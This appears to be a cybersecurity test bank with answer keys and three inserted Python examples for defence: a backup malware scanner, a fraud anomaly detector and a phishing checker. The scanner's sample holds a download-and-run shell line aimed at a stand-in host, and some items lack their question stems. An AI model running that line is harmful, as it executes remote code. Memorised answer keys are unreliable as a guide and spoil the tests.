Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
14. Exploits are gaps, holes, weaknesses, or flaws in corporate networks, IT security defenses,
user training, policy enforcement, data storage, software, operating systems, apps, or mobile
devices that expose an organization to intrusions or other attacks.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
15. Vulnerabilities exist in networks, OSs, apps, databases, mobile devices, and cloud
environments. These vulnerabilities are attack vectors for malware, hackers, hacktivists, and
organized crime.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
16. Risk is the probability of a threat successfully exploiting a vulnerability and the estimated
cost of the loss or damage.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
17. Hacking is an industry with its own way of operating, a workforce, and support services,
such as contract hackers.
Answer: True
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
18. Firewalls and intrusion detection systems (IDS) mostly protect against internal threats.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
20. Online gambling offers easy fronts for international money-laundering operations.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
21. Hardware and software security defenses are important because they protect against
irresponsible business practices.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
22. One of the biggest mistakes managers make is underestimating IT vulnerabilities and threats.
Answer: True
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
23. Most viruses, trojans, and worms are activated when an attachment is opened or a link is
clicked.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
24. When a host computer is infected, attempts to remove the malware may fail—and the
malware may reinfect the host during a restore if the malware is captured in backups or
archives.
Answer: True
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
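The practical consequence of item 24 is that a backup must be scanned before it is restored, or the clean-up undoes itself. The following is an added example in Python, not from the test bank or the textbook: it builds a small constructed backup archive in memory, hashes every file, compares the hashes against a (constructed) blocklist, looks for a (constructed) byte signature, and refuses the restore when anything matches. The malicious sample, its hash and the signature are stand-ins, not real indicators.

```python
import hashlib
import io
import tarfile

# Constructed stand-in for a malicious dropper script and its hash; not a real indicator.
MALICIOUS_SAMPLE = b"#!/bin/sh\ncurl http://example.invalid/x | sh\n"
KNOWN_BAD_SHA256 = {hashlib.sha256(MALICIOUS_SAMPLE).hexdigest()}
# Constructed byte signatures standing in for an AV or YARA rule set.
BAD_PATTERNS = [b"example.invalid/x | sh"]


def build_backup(files):
    """Build an in-memory tar archive from a {path: bytes} mapping (a constructed backup)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def scan_backup(tar_bytes, bad_hashes=KNOWN_BAD_SHA256, bad_patterns=BAD_PATTERNS):
    """Return [(member_path, reason)] for every archived file that matches a known-bad
    hash or a byte signature. An empty list means nothing was flagged."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            data = tar.extractfile(member).read()
            digest = hashlib.sha256(data).hexdigest()
            if digest in bad_hashes:
                findings.append((member.name, "sha256 on blocklist: " + digest[:16]))
                continue
            for pattern in bad_patterns:
                if pattern in data:
                    findings.append((member.name, "matches signature %r" % pattern))
                    break
    return findings


def safe_to_restore(tar_bytes):
    """Restore gate: only a backup with no findings may be written back to the host."""
    return not scan_backup(tar_bytes)


# Constructed sample backup: two clean files, one exact-hash match, one signature match.
SAMPLE_BACKUP = build_backup({
    "etc/crontab": b"0 3 * * * root /usr/local/bin/backup.sh\n",
    "home/alice/notes.txt": b"quarterly numbers\n",
    "home/alice/.cache/update.sh": MALICIOUS_SAMPLE,
    "home/bob/script.sh": b"echo hi\ncurl http://example.invalid/x | sh\n",
})

if __name__ == "__main__":
    for path, reason in scan_backup(SAMPLE_BACKUP):
        print("BLOCK restore of %s: %s" % (path, reason))
    print("safe to restore:", safe_to_restore(SAMPLE_BACKUP))
```

Hash matching only catches samples already on the blocklist, which is why the byte-signature pass is there as a second layer; a real restore pipeline would also quarantine the flagged members and restore the rest rather than rejecting the whole archive.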
25. Botnets often target select groups of people with something in common—they work at the
same company, bank at the same financial institution, or attend the same university.
Answer: False
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
26. Social networks and cloud computing increase vulnerabilities by providing a single point of
failure and attack for organized criminal networks.
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
27. Enterprises take risks with BYOD practices that they never would consider taking with
conventional computing devices.
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
28. According to a Mobile Phone report, 17 rogue apps managed to get into Google Play and
they were downloaded over 700,000 times before being removed. Rogue mobile apps can
contain malware or launch phishing attacks.
Answer: True
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
29. Fraudsters carry out their crime by threatening others and by taking advantage of their fears
of job loss or disciplinary action.
Answer: False
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
30. During the fraud investigation of Bernie Madoff, computer forensics experts were tasked
with uncovering digital messages that revealed “who knew what” and “who did what.”
Answer: True
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
31. Internal fraud prevention measures are based on the same controls used to prevent external
intrusions—perimeter defense technologies, such as firewalls, e-mail scanners, and biometric
access.
Answer: True
Difficulty: Medium
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
32. SOX and the SEC regulators are making it clear that if controls can be ignored, there is no
control. Therefore, fraud prevention and detection require an effective monitoring system.
Answer: True
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
33. Approximately 25 percent of occupational fraud could have been prevented if proper IT-based
internal controls had been designed, implemented, and followed.
Answer: False
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
34. Detection and damage containment are the most desirable fraud controls.
Answer: False
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
35. A biometric control is an automated method of verifying the identity of a person, based on
physical or behavioral characteristics.
Answer: True
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
36. A business impact analysis estimates the consequences of disruption of a business function
and collects data to develop recovery strategies.
Answer: True
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
Short Answer
1. The practice of people bringing and using their own mobile devices for work purposes is
called _________.
Answer: BYOD (bring your own device)
2. ____________ tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
Answer: Social engineering
3. A stealth network attack in which an unauthorized person gains access to a network and
remains undetected for a long time is referred to as a(n) ___________ attack.
Answer: Advanced persistent threat (APT)
4. One source of cybersecurity threats today is _____________, who hack for their own
causes and attempt to gain media attention.
Answer: Hacktivists
Difficulty: Easy
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
6. In Cybersecurity terminology, a(n) __________is defined as something or someone that may
result in harm to an asset.
Answer: threat
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: vulnerability
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: Risk
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer: Exposure
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
10. In Cybersecurity terminology, a(n) __________ is defined as a tool or technique that takes
advantage of a vulnerability.
Answer: Exploit
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
11. When sending sensitive email, James uses a program that transforms data into scrambled
code to protect it from being understood by unauthorized users. James is using ___________
to protect his email communications.
Answer: Encryption
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
12. In the United States, the Sarbanes–Oxley Act (SOX), Gramm-Leach-Bliley Act (GLB),
Federal Information Security Management Act (FISMA), and USA Patriot Act all require
businesses to protect PII, which stands for _______________.
Answer: Personally identifiable information
13. Access to top secret or highly secure networks associated with Homeland Security or
national defense often uses authentication methods based on a biological feature, such as a
fingerprint or retina, to identify a person. These methods are called ____________.
Answer: biometrics
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
14. _______ are software programs that users download and install to fix a vulnerability.
Answer: Patches
Difficulty: Easy
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
15. ______________ are designed to monitor network traffic and identify threats that may have
breached the network's initial defenses.
Answer: Intrusion detection systems (IDS)
AACSB: Use of Information Technology
16. _____________ is the elapsed time between when a vulnerability in a software app or system
is discovered and when it’s exploited.
Answer: Time-to-exploitation
Difficulty: Hard
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
17. Malware infected computers can be organized into networks called ________.
Answer: Botnets
Difficulty: Easy
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
19. When it comes to reducing employee fraud, regulators look favorably on companies that can
demonstrate good __________ and best practice operational risk management.
20. _____________detection identifies things like excessive hours worked, unusual transactions,
copying of huge amounts of data and other unusual patterns of behavior, and uses them to
alert IT managers to the possibility of internal fraud.
Answer: Anomaly
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology
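Item 20 names the signals (excessive hours, unusual transactions, bulk copying of data) but not how a baseline is built. The following is an added example in Python, not from the test bank or the textbook: it scores each user's daily activity against that user's own median and median absolute deviation, which an outlier cannot drag the way a mean can, and raises an alert when a value sits more than three spreads above the user's typical level. The activity log, the per-metric spread floors and the three planted outliers are constructed for the example.

```python
import statistics
from collections import defaultdict

# Metrics from the question, each with a floor on the spread so that a flat baseline
# (every day identical) still yields a sensible score. The floor values are assumptions.
METRIC_FLOORS = {"hours": 1.0, "bytes_copied": 50_000_000, "txn_amount": 500.0}


def build_sample_records():
    """Constructed activity log: four users, 11 days, small routine variation,
    plus one planted outlier per metric on day 11."""
    records = []
    for user in ("alice", "bob", "carol", "dave"):
        for day in range(1, 12):
            records.append({
                "user": user,
                "day": day,
                "hours": 8.0 + 0.5 * ((day % 3) - 1),
                "bytes_copied": 100_000_000 + 10_000_000 * (day % 4),
                "txn_amount": 1000.0 + 100.0 * (day % 5),
            })
    planted = {
        ("alice", 11): {"hours": 15.0},                  # excessive hours worked
        ("bob", 11): {"bytes_copied": 40_000_000_000},   # bulk data copy
        ("carol", 11): {"txn_amount": 25_000.0},         # unusual transaction
    }
    for rec in records:
        rec.update(planted.get((rec["user"], rec["day"]), {}))
    return records


def robust_score(value, history, floor):
    """Median/MAD deviation: how many spreads a value sits above the user's typical level.
    Median and MAD are used so the outlier cannot inflate its own baseline."""
    med = statistics.median(history)
    mad = statistics.median([abs(x - med) for x in history])
    return (value - med) / max(mad, floor)


def detect_anomalies(records, threshold=3.0):
    """Score every record against its own user's history and return the alerts."""
    by_user = defaultdict(list)
    for rec in records:
        by_user[rec["user"]].append(rec)
    alerts = []
    for user, rows in by_user.items():
        for metric, floor in METRIC_FLOORS.items():
            history = [r[metric] for r in rows]
            for r in rows:
                score = robust_score(r[metric], history, floor)
                if score > threshold:
                    alerts.append({"user": user, "day": r["day"], "metric": metric,
                                   "value": r[metric], "score": round(score, 1)})
    return alerts


if __name__ == "__main__":
    for a in detect_anomalies(build_sample_records()):
        print("ALERT %(user)s day %(day)d: %(metric)s=%(value)s (score %(score)s)" % a)
```

Per-user baselines matter here: a 40 GB copy is routine for a backup operator and alarming for a payroll clerk, so scoring against the population instead of the individual would miss the second and page on the first.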
21. The SEC and FTC impose huge fines for __________ in order to deter companies from
under-investing in data protection.
23. __________ is a process designed to achieve reliable financial reporting in order to protect
investors and comply with regulations.
24. __________ controls can verify a user’s identity, which creates the problem of privacy
invasion.
Answer: Biometric
Difficulty: Medium
Section Ref: 5.5 Compliance and Internal Control
AACSB: Use of Information Technology
25. A __________ estimates the consequences of disruption of a business function and collects
data to develop recovery strategies.
Answer: Business impact analysis
Essay Questions
1. Define social engineering. Describe two ways in which social engineering could be used to
obtain credentials from a user in order to gain access to an account or network.
Answer:
Social engineering tactics are used by hackers and corporate spies to trick people into revealing
login information or access codes.
Answers to the second question will vary. For example, students could describe phishing tactics
or other methods to motivate users to click a link or download an app that is infected.
Difficulty: Medium
Section Ref: 5.1 The Face and Future of Cyberthreats
AACSB: Use of Information Technology
2. Why are internal threats a major challenge for organizations? How can internal threats be
minimized?
Answer:
Threats from employees, referred to as internal threats, are a major challenge largely due to the
many ways an employee can carry out malicious activity. Insiders may be able to bypass
physical security (e.g., locked doors) and technical security (e.g., passwords) measures that
organizations have in place to prevent unauthorized access. Why? Because defenses such as
firewalls, intrusion detection systems (IDS), and locked doors mostly protect against external
threats.
Insider incidents can be minimized with a layered defense strategy consisting of security
procedures, acceptable use policies, and technology controls.
Difficulty: Medium
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
Answer:
Spear phishers often target select groups of people with something in common—they work at the
same company, bank at the same financial institution, or attend the same university. The scam e-
mails appear to be sent from organizations or people the potential victims normally receive e-
mails from, making them even more deceptive.
Here is how spear phishing works:
1. Spear phish creators gather information about people’s companies and jobs from social
media or steal it from computers and mobile devices. Then they use the information to
customize messages that trick users into opening an infected e-mail.
2. Then they send e-mails that look like the real thing to targeted victims, offering all sorts of
urgent and legitimate-sounding explanations as to why they need your personal data.
3. Finally, the victims are asked to click on a link inside the e-mail that takes them to a phony
but realistic-looking website, where they are asked to provide passwords, account numbers,
user IDs, access codes, PINs, and so on.
Difficulty: Hard
Section Ref: 5.2 Cyber Risk Management
AACSB: Use of Information Technology
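The three steps above are written from the attacker's side; the defender's mirror image is a mail check that looks for the same signals in each message. The following is an added example in Python, not from the test bank or the textbook. It assumes one trusted sender domain (examplebank.com) and two constructed messages, and it flags a sender domain one character away from the trusted one, a display name that borrows the trusted brand, a link whose visible text names a different host than its href, and the urgency wording step 2 describes.

```python
import email
import re
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed for this example: the organization the recipients normally get mail from.
TRUSTED_DOMAINS = {"examplebank.com"}
URGENCY_WORDS = ("urgent", "within 24 hours", "suspended", "verify now")


def edit_distance(a, b):
    """Levenshtein distance; a lookalike such as examp1ebank.com scores 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain, trusted=TRUSTED_DOMAINS, max_dist=2):
    """Return the trusted domain that `domain` imitates, or None if exact or unrelated."""
    for t in trusted:
        if domain != t and edit_distance(domain, t) <= max_dist:
            return t
    return None


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


HOST_IN_TEXT = re.compile(r"^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})")


def analyze_message(raw):
    """Return (category, detail) findings for one raw RFC 5322 message string."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    sender = msg["from"].addresses[0]
    domain = sender.domain.lower()
    imitated = lookalike_of(domain)
    if imitated:
        findings.append(("lookalike-sender-domain", "%s imitates %s" % (domain, imitated)))
    # Display name borrows a trusted brand while the address is not from that domain.
    name = re.sub(r"[^a-z0-9]", "", sender.display_name.lower())
    if domain not in TRUSTED_DOMAINS and any(t.split(".")[0] in name for t in TRUSTED_DOMAINS):
        findings.append(("display-name-impersonation", sender.display_name))
    body = msg.get_body(preferencelist=("html", "plain"))
    content = body.get_content() if body else ""
    collector = LinkCollector()
    collector.feed(content)
    for href, text in collector.links:
        href_host = (urlparse(href).hostname or "").lower()
        shown = HOST_IN_TEXT.match(text.lower())
        if shown and shown.group(1) != href_host:
            findings.append(("link-mismatch", "shows %s, goes to %s" % (shown.group(1), href_host)))
        if lookalike_of(href_host):
            findings.append(("lookalike-link-domain", href_host))
    haystack = ((msg["subject"] or "") + " " + content).lower()
    hits = [w for w in URGENCY_WORDS if w in haystack]
    if hits:
        findings.append(("urgency-language", ", ".join(hits)))
    return findings


# Constructed messages: one spear-phish in the shape the steps above describe, one benign.
PHISH = """\
From: ExampleBank Security <alerts@examp1ebank.com>
To: alice@example.org
Subject: Urgent: verify your account within 24 hours
Content-Type: text/html; charset="utf-8"

<html><body><p>Your account will be suspended unless you verify now.</p>
<p>Sign in at <a href="http://examp1ebank.com/login">https://examplebank.com/secure</a></p>
</body></html>
"""

BENIGN = """\
From: IT Helpdesk <helpdesk@examplebank.com>
To: alice@example.org
Subject: Monthly newsletter
Content-Type: text/html; charset="utf-8"

<html><body><p>Read the <a href="https://examplebank.com/news">newsletter</a>.</p></body></html>
"""

if __name__ == "__main__":
    for category, detail in analyze_message(PHISH):
        print("%-28s %s" % (category, detail))
    print("benign findings:", analyze_message(BENIGN))
```

None of these signals is conclusive on its own (legitimate mail uses urgency too), which is why each is reported as a separate finding for a scoring layer to weigh; the link-text mismatch and the lookalike domain are the two that a trained user is least likely to notice and a filter is best placed to catch.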
4. Discuss how social networks and cloud computing increase IT security risks. How do you
recommend that the risks be reduced?
Answer:
Difficulty: Medium
Section Ref: 5.3 Mobile, App, and Cloud Security
AACSB: Use of Information Technology
5. Explain internal fraud. Describe the most effective approach to preventing it.
Answer:
Internal fraud refers to the deliberate misuse of the assets of one’s employer for personal gain.
Internal audits and internal controls are essential to the prevention and detection of occupational
fraud.
The single most effective fraud prevention technique is the perception of detection and
punishment. If a company shows its employees that it can find out everything that every
employee does and will prosecute to the fullest extent anyone who commits fraud, then the
feeling that “I can get away with it” drops drastically. In addition, companies may use a
combination of defenses including intelligent analysis, audit trails, and anomaly detection.
Difficulty: Hard
Section Ref: 5.4 Defending Against Fraud
AACSB: Use of Information Technology